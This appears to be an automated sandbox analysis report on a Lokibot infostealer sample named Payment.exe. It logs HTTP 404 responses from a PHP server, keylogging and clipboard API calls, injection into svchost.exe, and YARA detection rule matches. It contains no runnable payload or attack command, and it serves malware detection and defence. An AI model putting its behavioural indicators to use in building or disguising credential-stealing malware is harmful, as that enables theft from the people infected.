cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1640&rtt_var=820&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Feb 2025 22:42:31 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pO83IcuiCCiXFw8RyUNFiT5z%2FLHpqFnc65bCr0LTg%2F5DnakbFNFflnoDSon7MA1lzHz%2FlWVru8ZOdiImTskrttMk3nE1vX0ln1LkdJAmjF4GPiSeP0EERqFzPPw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 918bb042d946438d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2170&min_rtt=2170&rtt_var=1085&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Feb 2025 22:42:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ppb%2B0Ve1sy7R%2BepDpRSZtxI4Ttx5BVcQDY7TMur3M%2BvjnFSQ0o6PfOY9cOUdvJQHEuN30sG0R%2BjYDvOguE9VF6OIRxJMFfIOvgHoy9i6G8v75Dt7yBQ3pOJOh4Y%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 918bb069aa6a43fa-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2237&min_rtt=2237&rtt_var=1118&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=182&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Feb 2025 22:42:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zUxi4iWaDl3KLFHlVlAg07bseUUvA9AFPoG2MZPF69zi6kRGoHf1golatchTCqkZ2xY%2BDr%2BBblPmOofqHraHN4fgbQIdNh%2BGD86bwGG1n84CaSzc2cIkS6l62tU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 918bb075f98132ca-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1978&min_rtt=1978&rtt_var=989&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Feb 2025 22:42:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WdECQiVQWh9Q4ttYIBx7dKNGi1l4Z1191iwfVbjJF5TT3ve%2BtjP5Jo44cvOOd%2F9dfE%2Fwo%2BGPWehxo6sCWwKr7icmj2z3A5kgMb4%2BsnenautFOkP%2BRZxG3CY7zfw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 918bb082282d41b2-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1727&min_rtt=1727&rtt_var=863&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Feb 2025 22:42:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PK0uNHzmjD0qN2Oz6A0cjYGpGP%2FX8%2BGiO8WceApamSqh%2BVdQpRQDMQrSj3lv3Y3H8oRW0t9Ng6jLlGjAnkjQ64eKNBxY4OMISR3s4AgKVvOs%2BC0tHNLFr8l5Hqo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 918bb08d5f85f5f7-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1654&min_rtt=1654&rtt_var=827&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=174&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Feb 2025 22:42:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N9Svhyvx3%2BLGL4UbK3pBFqflB2V%2BRCDPuzljm1S%2FSXBKkUbs7%2BIWu5b5nYDkuNEfpxF7irVC0V4MO%2BUAtL2jilBoeimD1WqMCbdcYn60RSO77fYAc5jZKp0ZSTU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 918bb0a5cc9480df-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1729&min_rtt=1729&rtt_var=864&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Feb 2025 22:42:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zTQnySwUMy1ceLu2jw8bstLUykKq9QKusgK2X5L0boxjq%2BG9b4k1hK0xwZy8WdUc0NoVpJQ%2Fs0YMsoJXoETrkckAsZSoOz6EdekOnUqvcZMQNWXNpZ44lnvRAUI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 918bb0bd297cf02d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1973&min_rtt=1973&rtt_var=986&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=93&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Feb 2025 22:42:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rswfNqRkzLk9Ub%2FrobD9vOVqcgN%2Bi%2BFxAfji29iJTMmX4rY4EDNsekAu3JSGuVFcDVqjkKa3ei%2Fw%2BecBltBsoOA%2BwWQzW7IN9CAb%2FSyeJHVUPS0tOf%2FpDMaTvj0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 918bb0c95f3c7298-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1968&min_rtt=1968&rtt_var=984&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=140&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Feb 2025 22:42:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ltUCeTotNXIesHqjx12MpSu%2Fx5dSXhAfUJ2jOOhzdjKNT1CmEY%2Byfb%2Fa%2Fb81BBBp6wpkGtnx7CifvZCCDXVEJDUJOs09eYF5QaD2pNTEH6kbyJTN0ICkxwMXiQ8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 918bb0ed8b6543e9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2249&min_rtt=2249&rtt_var=1124&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Feb 2025 22:43:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uhfWHF0wM86w7%2FBzRO0%2Bku%2BCW9KM%2FlVV3UfTV5DkajMzPWAf4UeIc8AN04LHoWPxAZg5O1JdjQD38FQh%2BIqGNUk6t61ClQF3djxh1SQDIapX5yIQ5Al8FlOxN2Y%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 918bb0fb4d2742f8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1803&min_rtt=1803&rtt_var=901&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Feb 2025 22:43:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IilKN8aBdM00J67RzLpv%2B%2BzroN7%2BMdoPFnxBJ0a65sgfunePSVUuKQk%2FayCq0%2B1lA2frh1FF1FAsiJHbdUGJw05tv%2Fym2kvxitVKX0kSpz7EpFjwGaO0wjDd374%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 918bb1136f6842f2-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1717&min_rtt=1717&rtt_var=858&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Feb 2025 22:43:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j6rzRvWNUCvK%2B16HrSyuPyhGe%2BJ4PcpMtXmoFw5Uujl7pnqgw8F5DLh%2F2n4kpxTGDKV3QMkcBfXhEpNbear6JbR5cLSyM%2FBds%2BzcOHu%2FE0e7wjVG0PHz22XHKe8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 918bb136994ec326-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1773&min_rtt=1773&rtt_var=886&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Feb 2025 22:43:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bIJVFU0loeavJ%2FRn1DtqziRzwAPfHyhqze6iXx547Ou%2B7UD78i%2FLziif0nb87cLjJKcTURE216LITxtwRpYFtjQcbwf1FYPqUFGxOTkSOzhZIdMLvIV4uwLWFy0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 918bb1429a6bc360-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1761&min_rtt=1761&rtt_var=880&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=139&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Feb 2025 22:43:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8F92c83CxWN%2FSuSMz3XjHMMprFhbT8cmx5nruDY7O8qT6vskLNlXMKziI%2FBzHrLtxrX6flpWzeaoJgZc%2BwRu6DZ2Wi6bZxHWN6WBQ8j1OarCca21lwpFpF23Mvg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 918bb166fee94277-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2400&min_rtt=2400&rtt_var=1200&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Feb 2025 22:43:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LQ3R5M7afP1bLHDVWUQhR2foRzEw%2Brw3H67MfKn1OGRSfe%2B9ffUS8vaFQ%2FZAZv56H3ATNyRYxqMdsbHnA69BwoxwQZJQnyY52cCUqrpuRwkREYZl82rgsQS6GTw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 918bb1737ffbc35a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2066&min_rtt=2066&rtt_var=1033&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: svchost.exe, svchost.exe, 00000001.00000002.2981317684.0000000000400000.00000040.80000000.00040000.00000000.sdmp

String found in binary or memory: http://www.ibsensoftware.com/

Source: C:\Users\user\Desktop\Payment.exe

Code function: 0_2_00884164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00884164

Source: C:\Users\user\Desktop\Payment.exe

Code function: 0_2_00884164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00884164

Source: C:\Users\user\Desktop\Payment.exe

Code function: 0_2_00883F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00883F66

Source: C:\Users\user\Desktop\Payment.exe

Code function: 0_2_0087001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_0087001C

Source: C:\Users\user\Desktop\Payment.exe

Code function: 0_2_0089CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0089CABC

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.Payment.exe.1830000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Payment.exe.1830000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Payment.exe.1830000.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Payment.exe.1830000.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Payment.exe.1830000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Payment.exe.1830000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Payment.exe.1830000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Payment.exe.1830000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Payment.exe.1830000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1752543967.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1752543967.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1752543967.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000000.00000002.1752543967.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1752543967.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000001.00000002.2981317684.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000001.00000002.2981317684.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000001.00000002.2981317684.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000001.00000002.2981317684.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.2981317684.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: Process Memory Space: Payment.exe PID: 6096, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: svchost.exe PID: 2492, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\Payment.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00813B3A
Source: Payment.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Payment.exe, 00000000.00000000.1738544433.00000000008C4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_55a277c8-8
Source: Payment.exe, 00000000.00000000.1738544433.00000000008C4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_415f3a28-3
Source: Payment.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_9d1a8560-5
Source: Payment.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_6d123966-a

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Payment.exe

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00C63540 RtlImageNtHeader,RpcMgmtSetServerStackSize,I_RpcServerDisableExceptionFilter,RtlSetProcessIsCritical,SetProcessMitigationPolicy,SetProcessMitigationPolicy,SetProcessMitigationPolicy,SetProtectedPolicy,HeapSetInformation,NtSetInformationProcess,	1_2_00C63540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00C633C0 NtSetInformationProcess,SetUnhandledExceptionFilter,SetErrorMode,GetProcessHeap,InitializeSRWLock,InitializeSRWLock,RegDisablePredefinedCacheEx,EtwEventRegister,GetCommandLineW,memset,GetCurrentProcess,NtSetInformationProcess,HeapFree,HeapFree,ExitProcess,GetCurrentProcess,SetProcessAffinityUpdateMode,	1_2_00C633C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00C62720 RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegCloseKey,HeapAlloc,RegQueryValueExW,ExpandEnvironmentStringsW,LCMapStringW,RegQueryValueExW,HeapFree,AcquireSRWLockShared,ReleaseSRWLockShared,HeapAlloc,memcpy,memcpy,AcquireSRWLockExclusive,ReleaseSRWLockExclusive,RegGetValueW,ActivateActCtx,LoadLibraryExW,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,ActivateActCtx,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,ActivateActCtx,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,RegCloseKey,HeapAlloc,RegGetValueW,WideCharToMultiByte,HeapAlloc,WideCharToMultiByte,HeapFree,ExpandEnvironmentStringsW,HeapFree,CreateActCtxW,GetLastError,HeapFree,HeapFree,GetLastError,CreateActCtxW,GetLastError,ReleaseActCtx,GetLastError,GetLastError,RtlNtStatusToDosError,GetLastError,LoadLibraryExW,RtlNtStatusToDosError,LoadLibraryExW,RtlNtStatusToDosError,HeapFree,ReleaseActCtx,	1_2_00C62720

Source: C:\Users\user\Desktop\Payment.exe

